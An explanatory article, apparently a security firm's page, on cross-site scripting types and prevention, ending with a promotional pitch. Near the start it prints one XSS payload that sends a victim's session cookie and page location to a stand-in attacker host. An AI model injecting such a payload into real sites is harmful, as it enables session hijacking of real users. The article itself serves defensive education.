WHAT IS CROSS-SITE SCRIPTING (XSS)
WHAT IS CROSS-SITE SCRIPTING (XSS)
Cross-site scripting (XSS) is a sort of injection attack in which a threat actor inserts data from trustworthy websites, such as a malicious script. The malicious code is subsequently supplied to the victim’s browser along with dynamic content.
Cross-site scripting (XSS) is an attack in which a malicious executable script is injected into the code of a trusted program or website. An XSS attack is frequently initiated by providing a malicious link to a user and tempting the user to click on it. If the app or website does not properly sanitize its data, the malicious link executes the attacker’s selected code on the user’s PC. As a result, the attacker can take the active session cookie from the user. Here’s an illustration:
<script>i=new/**/Image();isrc=http://evilwebsite.com/log.php?’+document.cookie+’ ‘+document.location</script>
While the payload is often JavaScript, XSS can occur with any client-side language.
How does cross-site scripting work
XSS is comparable to injection attacks like Structured Query Language injection. It makes use of the browser’s inability to discriminate between legal and malicious markup. They process whatever markup text they receive and give it to users that want it.
The Same Origin Policy is violated by XSS attacks. SOP is a security feature that prohibits scripts from one website from interacting with scripts from another. All material on a webpage must come from the same source, according to the SOP. When the policy is not enforced, bad actors can inject scripts and change a webpage to their liking. For example, attackers can harvest data that allows them to impersonate a legitimate user or enter malicious code into the browser for execution.
An XSS flaw allows an attacker to obtain session cookies and subsequently pose as the user (victim). However, XSS may be used to propagate malware, deface websites, wreak havoc on social networks, phish for credentials, and, when combined with social engineering tactics, execute more destructive assaults.
Types of XSS attacks
Cross-site scripting vulnerabilities are classified into three types: stored XSS reflected XSS, and DOM-based XSS.
Stored XSS
Stored XSS attacks are also known as persistent XSS attacks. It is the most dangerous kind of cross-site scripting attack. The attacker injects a malicious script, which is also known as a payload. The payload is permanently kept on the target application, which might be a database, blog, message board, forum post, or comment box.
When victims visit the vulnerable webpage in a browser, the XSS payload is provided as part of the page. When victims access the website in a browser, the malicious script is executed unwittingly.
XSS Reflection
The most frequent sort of cross-site scripting vulnerability is reflected in XSS. The attacker must deliver the payload to the victim in this type of attack. The attacker employs phishing and other social engineering approaches to entice victims to unwittingly submit a request to the webserver that includes the XSS payload script.
The payload from the HTTP request is included in the Hypertext Transfer Protocol response that is returned. The victim then runs the script, which is mirrored and executed within the browser. Because reflected XSS is not a persistent attack, the attacker must give the payload to each victim.
DOM-based cross-site scripting (XSS)
DOM-based assaults are sophisticated attacks that are made feasible when the client-side script of a web application adds user-supplied data to the DOM. The data from the DOM is read by the web application and sent to the browser. If the data is not handled properly, the attacker can inject a payload that is stored as part of the DOM. When the data is read back from the DOM, the payload is then executed.
How to Prevent Cross-Site Scripting Attacks
Attackers use a range of techniques to exploit website flaws. As a result, no one approach exists to reduce the danger of a cross-site scripting attack.
Cross-site scripting is based on hazardous user input being directly displayed onto a web page. Cross-site scripting attacks would be impossible if user inputs were properly sanitized. There are several methods for ensuring that user inputs on your websites cannot be evaded.
We recommend that you harden your web apps using the following security precautions to secure your website.
1. Allowable List Values
User input should be limited to a certain allowlist. This method guarantees that the server receives only known and safe values. Restricting user input is only useful when you know what data you will get, such as the contents of a drop-down menu, and is impractical for custom user content.
2. Avoid and limit using HTML in inputs.
While HTML may be required for rich information, it should only be used by trustworthy people. If you do enable style and formatting on an input, you should think about utilizing other content generation methods, such as Markdown.
Finally, if you do utilize HTML, make sure to sanitize it with a powerful sanitizer like DOMPurify to eliminate any dangerous code.
3. Values should be sanitized.
When adding user-generated material to a page, replace dangerous characters with their proper entities to guarantee that it does not result in HTML content. Entities resemble ordinary characters in appearance but cannot be used to build HTML.
4. Use HTTPOnly Cookie Flags
Session cookies enable a website to distinguish a user between queries, and attackers commonly hijack admin sessions by exfiltrating their cookies. After stealing a cookie, attackers can log in to their account without credentials or being allowed access.
HttpOnly cookies prohibit JavaScript from viewing the cookie’s content, making it more difficult for an attacker to hijack the session.
This solution only stops attackers from reading the cookie. While impersonating as an admin user, attackers can still use the active browser session to submit requests. This strategy is also only helpful when cookies are used as the primary identifying mechanism.
5. Use a Web Application Firewall (WAF) to protect against cross-site scripting attacks.
A firewall may be used to virtually patch assaults on your website. This approach detects and prevents XSS, RCE, and SQLi threats before they reach your website. It also protects against large-scale assaults such as DDOS.
How can you avoid XSS vulnerabilities?
It is critical to implement security measures early in the development life cycle of an application. Carry-out software design phase security tasks such as architecture risk analysis and threat modeling, for example. It is also critical to do security testing once application development is completed.
Among the strategies for preventing XSS attacks are the following:
Never rely on user input.
Enable output encoding.
Validate the user’s input.
Adhere to the notion of defense in depth.
Ascertain that web application development adheres to the OWASP XSS Prevention Cheat Sheet.
Perform penetration testing after remediation to ensure that it was successful.
Protect your company by adhering to secure development rules, which include incorporating security into all aspects of application development. Output encoding is also important for avoiding XSS issues. Use output encoding libraries that are appropriate for the programming languages and frameworks used by your company. Also, make certain that your engineers are up to speed on XSS protection best practices.
UK Cyber Security Group Ltd is here to help
Please check out our Cyber Essentials Checklist
Please check out our Free Cyber Insurance
If you would like to know more, do get in touch as we are happy to answer any questions. Looking to improve your cybersecurity but not sure where to start? Begin by getting certified in Cyber Essentials, the UK government’s scheme that covers all the technical controls that will provide the protection that you need to help guard against criminal attacks. Or just get in touch by clicking contact us